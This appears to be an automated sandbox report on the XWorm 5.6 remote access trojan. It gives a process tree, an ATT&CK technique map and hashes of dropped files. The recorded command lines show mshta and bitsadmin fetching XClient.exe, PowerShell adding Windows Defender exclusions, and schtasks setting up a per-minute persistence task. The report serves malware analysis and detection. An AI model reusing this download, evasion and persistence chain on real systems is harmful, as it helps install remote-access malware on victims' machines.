PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 1296	2596	msedge.exe	124
PID 2596 wrote to memory of 4796	2596	msedge.exe	125
PID 2596 wrote to memory of 4796	2596	msedge.exe	125
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126
PID 2596 wrote to memory of 3148	2596	msedge.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/d00mt3l/XWorm-5.6
1⤵
PID:2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=3504,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=1040 /prefetch:1
1⤵
PID:4380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4876,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:1
1⤵
PID:4268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5100,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=5408 /prefetch:8
1⤵
PID:4988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5412,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=5568 /prefetch:8
1⤵
PID:2596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=5924,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:8
1⤵
PID:2980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --field-trial-handle=6244,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=6188 /prefetch:8
1⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6252,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=6288 /prefetch:1
1⤵
PID:756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=6864,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
1⤵
PID:2044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --field-trial-handle=6128,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=6332 /prefetch:8
1⤵
PID:5048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=6132,i,3387628439405076340,17957358341235678872,262144 --variations-seed-version --mojo-platform-channel-handle=6060 /prefetch:8
1⤵
PID:3256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=127.0.6533.89 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=127.0.2651.86 --initial-client-data=0x238,0x23c,0x240,0x234,0x264,0x7ffe62fad198,0x7ffe62fad1a4,0x7ffe62fad1b0
  2⤵
  PID:4712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3188,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=3184 /prefetch:2
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1968,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=3324 /prefetch:3
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --field-trial-handle=2240,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=3428 /prefetch:8
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4384,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=4440 /prefetch:8
  2⤵
  PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4384,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=4440 /prefetch:8
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4716,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=4772 /prefetch:8
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --field-trial-handle=4764,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --field-trial-handle=2464,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=3164 /prefetch:8
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5116,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=3476,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=988 /prefetch:8
  2⤵
  PID:1844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --field-trial-handle=1416,i,10913914115254808718,17945741096712694814,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:8
  2⤵
  PID:4560

C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\127.0.2651.86\elevation_service.exe"
1⤵
PID:988

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1596

C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\Xworm V5.6.exe
"C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\Xworm V5.6.exe"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4488
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nmayihls\nmayihls.cmdline"
  2⤵
  PID:2792
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDFD3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3E9CEFB0C7E7481FB78A242C44FACA8.TMP"
    3⤵
    PID:3952

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:648

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f0 0x2cc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:2804
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:5052

C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\XwormLoader.exe
"C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\XwormLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3464

C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\XwormLoader.exe
"C:\Users\Admin\Downloads\XWorm-5.6-main\XWorm-5.6-main\XwormLoader.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3260

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3572
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:3760

C:\Users\Admin\Downloads\XClient.exe
"C:\Users\Admin\Downloads\XClient.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:232
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4556
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\pxicix.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  PID:1856
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:5024

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5104

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3448

C:\Users\Admin\AppData\Roaming\XClient.exe
C:\Users\Admin\AppData\Roaming\XClient.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Scripting

T1064

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

BITS Jobs

T1197

Modify Registry

T1112

Scripting

T1064

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
750c62acd019a9b08c61d93bf56241ee

SHA1
4bd981bb26f36676bf47d05a0f5b14fd054fe2e5

SHA256
82ef10024129f20b7971db7b68658db62b0cc6673307b7f33e2ea797b5e78ec0

SHA512
34acaf68626c9a0cf460a5b0d141a7a757a1e16d23e396fd01d08aaef7659e1c5de2dd5cb761b5d0e6f95de057a606e6ddb85cec6523af99e0ccf20fa11a682f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
12KB

MD5
7551f94b2bca99142f3d4aed82a03427

SHA1
12cb5d0ab0dd633236438e203cfb530094054493

SHA256
38768494d07dcace53a6a758ed3b3d5c96c1019013ff0be0b04ed0e72c692964

SHA512
2b91bb23d4c7af64d517a9453b7a3edec9188c0f40f0457d7f503284cc3c2ce958da4d27de8cb633200d263eba3b98eeb2b4874d194b0a02bb2c3f50e7a42c87

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
30KB

MD5
abca668ae1b998b01177c8c98a86adc7

SHA1
9020eae519af2f730f18d0ca5b8533a382f23fe4

SHA256
e9f55f9f8dda45005119d0d3e97a4fd5a4476b81749610792a078fc4d7a3999d

SHA512
645d4594e7a17749d9bd3e2b33db59fc629329056cfe9b439ac08ed7dfbfab2cb9268909e6e04ddd14b44aaa799a423858ad75f1e7a28765ab7f3298899ef224

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
63KB

MD5
5702d119606230ad6d28a888a0190e81

SHA1
e2026abe56a1dc1a280e094c90b067e9fd61e498

SHA256
aaf6c8ae838a53c22447abeaea690916ccf19baa4c964d95b400628616cad6e2

SHA512
77c8e4b5d97139704946f185cbf73130a6f3a6c2228390a48c0900430e392018ea574c362d0effb4ac116f539cff137e6a34c88740dabbc787761d09b5d3caac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
63KB

MD5
d217161ea653d8fa6d1a144d4cc6241c

SHA1
f3d0b117ab68302e2d5df51235b1bfff8f9db6b5

SHA256
acf5a3364e0f7d85a099dc3acd4e774c305a471375598611ac4d4c7d34d627db

SHA512
79c952725bbbdba53062f5c63c41c6b835959236ad36d2237df59926bbd7107330e6235adf1d4b04c5177932eef24ac4c7731546bf790e980358fa8612a92599

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c562925135c2ec811a1565f0226b4c1b

SHA1
032c476c6671e1e630f8a48555f9a1afa936eba4

SHA256
f7e436d6a759658e328114a3d7c7ec7bb112841823fa09bab26eb1695d944f8f

SHA512
db92dbcb618f407741428b7a051ff37600f86f34ca0bcae565578e8627c0af30f1de3e16935f87ca58b4e8cdeebbe3c83c8d4d82e124dadc16dde24bd164da60

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0a5771355b314598335e4d9ad81fcff1

SHA1
83bd5f4a12ce2783aded90635d1f7b004db7b402

SHA256
e6a7c46a00821d9df58b9e296d0b583717bb25a442aba4c6d27c5d2a19cea140

SHA512
cc49530d8afd743f6fa9688ff5748170b8b3fd03f5e9d9363690f1bd5a5e920315d36be03269d6b0daa1951d469b9d48f584d449b7731cdf1a828470c05444ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
110b59ca4d00786d0bde151d21865049

SHA1
557e730d93fdf944a0cad874022df1895fb5b2e2

SHA256
77f69011c214ea5a01fd2035d781914c4893aee66d784deadc22179eadfdf77f

SHA512
cb55ac6eca50f4427718bace861679c88b2fdfea94d30209e8d61ca73a6ce9f8c4b5334922d2660a829b0636d20cbdf3bae1497c920e604efe6c636019feb10e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDFD3.tmp

Filesize
1KB

MD5
927c8b44a69bff279d4a8cd4f8d766c0

SHA1
1f2e47b66a790acbb45f139f9a02ec1db3f18150

SHA256
dc07d7ee1d864d4988ab7d0e0db4b260af273a6dda708ef74c71ffa4711e071e

SHA512
0de871a9020f5263ef0c9350d04f52a9e14ab37bab73c20be2f2ec9492be7592a98caa4f3fbacf29f7458a829c329a6b07fdcbbf59f666791cb3c19ff85140b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_55epbg2x.scq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nmayihls\nmayihls.0.vb

Filesize
78KB

MD5
1baedff1dbedf7d9587cac785bb546d6

SHA1
7d55ed8d140699d3dc84ce8f4e3dd29634fd3124

SHA256
c69370dfebd99a679d732bbce0b9f61c7a313d0853cf4940ad5d6230952f4ec2

SHA512
bd60cca1677465e149b6e90298d90704b41b541a7d5dbe866b620918a41e024ba363f983583178987f6c4e09e722a401f36ae2044b89dd48d710b2208e3d7bbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\nmayihls\nmayihls.cmdline

Filesize
292B

MD5
a59d0530b86d1711326d61877ac6ca16

SHA1
2649cebdda004dacf9785be0fd0ccad420068806

SHA256
d688e18902c868d0ee79f88d3a19a252cd5e289599d9bbd6bc9fd0d920888ea7

SHA512
5bd149c19e5830178c4ef94973706c3b4cc3d60fc72ea45143d1a0fb6f1410ec19705cb08d2bbeb79516825a0920c572ed3d5d180b7c793aafd122027e19fcdb

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbc3E9CEFB0C7E7481FB78A242C44FACA8.TMP

Filesize
1KB

MD5
d40c58bd46211e4ffcbfbdfac7c2bb69

SHA1
c5cf88224acc284a4e81bd612369f0e39f3ac604

SHA256
01902f1903d080c6632ae2209136e8e713e9fd408db4621ae21246b65bfea2ca

SHA512
48b14748e86b7d92a3ea18f29caf1d7b4b2e1de75377012378d146575048a2531d2e5aaeae1abf2d322d06146177cdbf0c2940ac023efae007b9f235f18e2c68

Download Submit
C:\Users\Admin\Downloads\Downloader.hta

Filesize
840B

MD5
f27fe2354ebb52cffbb3a8cf66c6bdb3

SHA1
439ce7924db3f534a14d78470c57c98e397969ee

SHA256
30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4

SHA512
7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f

Download Submit
C:\Users\Admin\Downloads\XClient.exe

Filesize
45KB

MD5
8624545aefbda4c00637218ab98266e8

SHA1
2e52ea720c68644bca3ef08b01f9dc74323f1eb9

SHA256
0d4e1cadafa75a69fbf99580545ce19d8908838306bb17c1378bc3df066d9d57

SHA512
